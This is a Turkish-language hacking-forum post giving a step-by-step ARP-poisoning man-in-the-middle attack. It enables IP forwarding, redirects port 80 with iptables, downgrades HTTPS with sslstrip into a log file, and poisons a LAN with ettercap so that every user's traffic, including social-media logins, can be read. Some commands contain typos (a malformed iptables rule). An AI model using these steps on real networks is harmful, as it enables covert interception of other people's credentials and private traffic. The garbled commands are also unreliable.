Neler yeni

Arp Poisoning //DEV KONU// (1 Viewer)

Mesajlar
61
Credits
77
Öncelikle bayram dolayısıyla memelekete geldim bilgeseyerım burda olmadığı için resim koyamıcam

Arp zehirlemeye geçelim:

Öncelikle ip yönlendirmemizi etkin hale getirmemiz gerekiyor. echo '1' >/proc/sys/net/ipv4/ip_forward
komutu ile yönlendirmeye açıyoruz emin olmak için eğer konsolacat /proc/sys/net/ipv4/ip_forward
yazdığımızda sonuç "1" ise başarılı olmuştur



Şimdi port yönlendirmesi yapmamız gerekiyor bunun için linux"un güvenlik duvarı ile yapıcaz
Kodumuz: iptables -t -A PREOUTİNG -i eth0 -p tcp --destination-port 80 -j REDİRECT --to-port 8080
konsola yazdıktan sonra artık bulunduğumuz ağ içerisinde 80 portu yani web uygulama portundan geçen paketleri 8080 portundan geçirdik

Hala bir sorunumuz var biliyosunuzki çoğu sosyal medya sitesi "https" güvenlik protokolü kullanıyor bunun içinde ağdaki https leri http ye çevirmemiz gerekiyor aksi taktirde paketleri okuyamayız.

Linuxta hali hazırda gelen sslstrip"i kullanıcağız

Kodumuz: sslstrip - w loglar.log -l 8080

Kodda sslstrip aracı https protokolinğ http"ye çeviriyp "-l" ile portumuzu "-w" ile dosya ismini belirledik.

Gelelim asıl eğlenceli olaya?

Ettercap kullanıcağız

Kodumuz:ettercap -T -q -i eth0 -M ARP /192.168.227.132 / // output:

local ip aresiniz farklı olabilir siz ona göre girin
"-i" ile arayüzümüzü seçiyoruz
"-M" ile saldırı türümüzü seçtik
"-T -q" ile arayüz tipmizi yazı olarak belirledik

bundan sonra artık ağda ne kadar kişi varsa bütün paketler http olarak konsola gelicektir.

DipNot: Birden fazla terminal açtıktan sonra eğer kapatırsanız bütün işlemler tekrardan.

Probber!!
Teşekkürler :)
 

Bu konuyu görüntüleyen kullanıcılar